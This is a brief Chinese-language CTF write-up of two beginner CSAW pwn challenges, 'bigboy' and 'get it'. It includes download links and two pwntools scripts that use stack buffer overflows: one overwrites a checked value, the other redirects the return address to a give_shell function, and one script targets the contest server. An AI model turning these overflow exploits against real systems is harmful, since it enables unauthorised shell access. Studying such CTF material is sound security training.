18.9.16 PWN3/4----bigboy/get it
今天正好看到了CSAW,這個是pwn裡最簡單的兩個題目題目
3. bigboy
連結:https://pan.baidu.com/s/1fsq8j7KQBOHRBdK4lZUMbA 密碼:hsw6
直接IDA
emmm……不想說話,簡單溢位就好,指令碼
#coding=utf-8
from pwn import *
#conn=remote('pwn.chal.csaw.io',9000)
conn=process('./boi')
payload=0x10*'a'+p64(0xCAF3BAEE)
conn.recvuntil("Are you a big boiiiii??")
conn.sendline(payload)
conn.interactive()
4. get it
連結:https://pan.baidu.com/s/1Wsmb1-giiTvmAKCMNA9INw 密碼:aqtu
拖進IDA,我們可以看到提取許可權的指令在另一個函式give_shell中,通過溢位,把返回地址改掉就好
上指令碼
#coding=utf-8
from pwn import *
#conn=process('./get_it')
conn=remote('pwn.chal.csaw.io',9001)
payload=0x28*'a'+p64(0x00000000004005B6)
conn.recvuntil("Do you gets it??")
conn.sendline(payload)
conn.interactive()